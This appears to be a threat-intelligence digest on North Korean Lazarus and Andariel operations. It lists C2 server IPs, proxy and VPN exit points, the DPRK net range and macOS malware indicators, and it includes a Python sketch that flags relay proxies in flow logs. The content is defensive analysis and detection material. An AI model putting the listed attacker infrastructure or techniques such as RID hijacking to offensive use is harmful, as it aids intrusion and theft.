  • Multiple C2 servers from the IP address 83[.]234[.]227[.]50. This IP connected to the latest C2 server, 94[.]131[.]9[.]32, between January 17 and January 18 via port 1245 and remains active at the time of writing. Additionally, it has historically connected to 185[.]153[.]182[.]241 on ports 1224, 1245, 2248, 2252 (C2-specific ports), and 3389 (RDP) between December 26 and January 16. It also established connections with 5[.]253[.]43[.]122 during the period of December 26 to January 17 over ports 1224, 1245, and 3389. Both servers were used in targeted campaigns linked to this operation.
  • The adversary accessed 185[.]153[.]182[.]241 via Remote Desktop Protocol (RDP) on several occasions, specifically on December 30, January 6, and January 10, maintaining an RDP session for 10 days. In the context of Operation99, which involved the C2 server 5[.]253[.]43[.]122, the adversary logged in via RDP more than a dozen times between December 26 and January 15.
  • IP address 83[.]234[.]227[.]50 serves as an intermediate proxy controlled by the Lazarus group, given its connection to multiple distinct C2 servers. Further analysis identified another IP, 83[.]234[.]227[.]49, from the same net-range connecting to a different Lazarus-controlled server (45[.]128[.]52[.]14) over ports 3389, 1224, and 1245 between December 2 and December 10. This C2 was hosted on Stark Industries infrastructure and exhibited activity similar to Operation99, which was linked to attacks publicly reported in November 2024 involving Lazarus’ presence on the Codementor platform.
  • Going deeper, we uncovered another Lazarus C2 server, 86[.]104[.]74[.]51, which was active throughout most of November 2024. This server, also hosted on Stark Industries infrastructure, resolved to the domain sageskillsuk[.]com in late September 2024, spoofing the legitimate entity skillsage. The C2 server was accessed by the same intermediate proxy exit points hosted in Russia.
  • STRIKE assesses with high confidence that the IPs used to connect to the C2s were merely a relay/proxy and used to obfuscate the true origin. The adversary was establishing a secondary session after connecting to the VPN with the proxy, thus obscuring the true origin of where they actually connected from. During the Sageskills attack in November 2024, we observed a connection from an Astrill VPN IP address (70.39.70.196) to 83[.]234[.]227[.]53 between November 1 and November 6, 2024. According to VirusTotal the Astrill IP address is linked to the DPRK IT Worker scheme, which at first seemed low confidence, but after analysis we can assess with high confidence that it is an exit point used by Lazarus.
  • In December, the same Astrill IP was also observed connecting to 83[.]234[.]227[.]50, which had been seen communicating with the C2 servers. In the latest campaign we discovered, another Astrill VPN IP address was seen connecting to the proxy 83[.]234[.]227[.]53 on 1/23/2025, which in turn connected to the C2 94[.]131[.]9[.]32 on that same day. North Korea has used Astrill VPNs in the past, which have been identified in targeted IT worker schemes.
  • North Korea appears to be using Astrill VPNs significantly from the North Korean net-range 175.45.176.0/22 which represents their only assigned address space. The following is the analysis of specific IPs involved in routing traffic through proxies in Russia to manage C2 infrastructure.
  • In December 2024, a North Korean IP address (175.45.178.130) was observed connecting to the Astrill VPN (70.39.70.196), aligning with the timeframe of the campaign's attacks and Indicators::
  • 5[.]253[.]43[.]122
  • 185[.]153[.]182[.]241
  • 83[.]234[.]227[.]50
  • 83[.]234[.]227[.]49
  • 45[.]128[.]52[.]14
  • 86[.]104[.]74[.]51
  • Astrill VPN 70.39.70.196 to 83[.]234[.]227[.]53
  • 83[.]234[.]227[.]53
  • 94[.]131[.]9[.]32
  • 175.45.176.0/22
  • 175.45.178.130 observed connecting to the Astrill VPN (70.39.70.196)
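The infrastructure pivot this entry describes, as an added example in Python that is not SecurityScorecard's tooling and not part of this repository: a single source address that reaches several distinct known C2 servers over the management ports named above (1224, 1245, 2248, 2252 and 3389) is the pattern by which the report identifies 83[.]234[.]227[.]50 as a relay, and the 175.45.176.0/22 range is the one the report gives as North Korea's only assigned address space. Flow records are constructed, in an assumed `(src, dst, dport, day)` tuple form; the addresses, ports and range are those the entry lists.

```python
"""Flow-correlation sketch for the Operation Phantom Circuit pivot.

Added example; not SecurityScorecard's code nor part of this repository.
Flow records are assumed to be (src, dst, dport, day) tuples, which is a
constructed format; the indicators are the ones the entry above lists.
"""
import ipaddress
from collections import defaultdict

# C2 servers named in the entry and the ports the report calls C2-specific
# (1224, 1245, 2248, 2252) plus RDP (3389), which the adversary used to
# administer them.
KNOWN_C2 = {
    "94.131.9.32",
    "185.153.182.241",
    "5.253.43.122",
    "45.128.52.14",
    "86.104.74.51",
}
MGMT_PORTS = {1224, 1245, 2248, 2252, 3389}

# The range the report gives as North Korea's only assigned address space.
DPRK_RANGE = ipaddress.ip_network("175.45.176.0/22")


def find_management_proxies(flows, min_distinct=2):
    """Return {source: [C2s]} for sources that reach at least `min_distinct`
    known C2 servers on management ports. One C2 can be a coincidence; two
    or more from the same source is the relay signature the entry relies on."""
    reached = defaultdict(set)
    for src, dst, dport, _day in flows:
        if dst in KNOWN_C2 and dport in MGMT_PORTS:
            reached[src].add(dst)
    return {src: sorted(c2s) for src, c2s in reached.items() if len(c2s) >= min_distinct}


def flows_from_dprk_range(flows):
    """Flows whose source falls inside 175.45.176.0/22 (direct, un-proxied
    activity; the entry notes such a source connecting to an Astrill VPN)."""
    return [f for f in flows if ipaddress.ip_address(f[0]) in DPRK_RANGE]


# Constructed flow records. The sources, destinations and ports mirror the
# connections the entry describes; the days are illustrative.
SAMPLE_FLOWS = [
    ("83.234.227.50", "94.131.9.32", 1245, "2025-01-17"),
    ("83.234.227.50", "185.153.182.241", 3389, "2024-12-30"),
    ("83.234.227.50", "5.253.43.122", 1224, "2025-01-05"),
    ("83.234.227.49", "45.128.52.14", 1245, "2024-12-03"),   # one C2 only
    ("203.0.113.7", "185.153.182.241", 443, "2025-01-02"),   # not a mgmt port
    ("175.45.178.130", "70.39.70.196", 443, "2024-12-11"),   # DPRK range -> VPN
]

if __name__ == "__main__":
    for src, c2s in find_management_proxies(SAMPLE_FLOWS).items():
        print("relay candidate:", src, "->", ", ".join(c2s))
    for src, dst, dport, day in flows_from_dprk_range(SAMPLE_FLOWS):
        print("DPRK-range source:", src, "->", f"{dst}:{dport}", day)
```

Against the constructed records, only 83.234.227.50 crosses the two-C2 threshold; 83.234.227.49 reaches a single C2 and is left for manual review, which matches how the entry treats it (same net-range, but a weaker signal on its own). The threshold and the port set are the two knobs to tune against your own flow volume.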

How a North Korean dev tricked a Solana trading bot team and stole $1.4m

Date:: 2025-01-30 URL:: https://www.dlnews.com/articles/regulation/how-a-dprk-developer-tricked-solareum-and-stole-14m/ Tags:: DPRK-IT Details::

  • In December, the Solareum team said in the app’s support channel that it was “onboarding a new dev.” After users reported that their wallets had been drained in March, the proceeds were laundered through crypto exchanges, including HTX, Binance, MEXC, EasyBit and FixedFloat, according to prosecutors. Indicators::

North Korean Hackers Exploit RID Hijacking to Gain Full Control Over Windows Systems

Date:: 2025-02-01 URL:: https://www.cysecurity.news/2025/02/north-korean-hackers-exploit-rid.html Tags:: Andariel Details::

  • A North Korean cybercriminal group, Andariel, has been found using a stealthy hacking technique called RID hijacking to gain full control over Windows systems. This method allows attackers to manipulate a computer’s security settings, turning a low-privilege user account into an administrator account and granting them hidden control over the system. Andariel typically gains initial access by exploiting software vulnerabilities or tricking users into downloading malware. Once inside, they use hacking tools like PsExec and JuicyPotato to obtain SYSTEM-level privileges, the highest level of access on a Windows machine. Indicators::

macOS FlexibleFerret: Further Variants of DPRK Malware Family Unearthed

Date:: 2025-02-03 URL:: https://www.sentinelone.com/blog/macos-flexibleferret-further-variants-of-dprk-malware-family-unearthed/ Tags:: DPRK-CI Details::

  • Last week Apple pushed a signature update to its on-device malware tool XProtect to block several variants of what it called the macOS Ferret family: FROSTYFERRET_UI, FRIENDLYFERRET_SECD, and MULTI_FROSTYFERRET_CMDCODES. This DPRK-attributed malware family was first described by researchers in December and further in early January and identified as part of the North Korean Contagious Interview campaign, in which threat actors lure targets to install malware through the job interview process. Indicators::
  • zoom.callservice[.]us
  • Liseth Alejandra Trujillo Garcia
  • api.ipify.org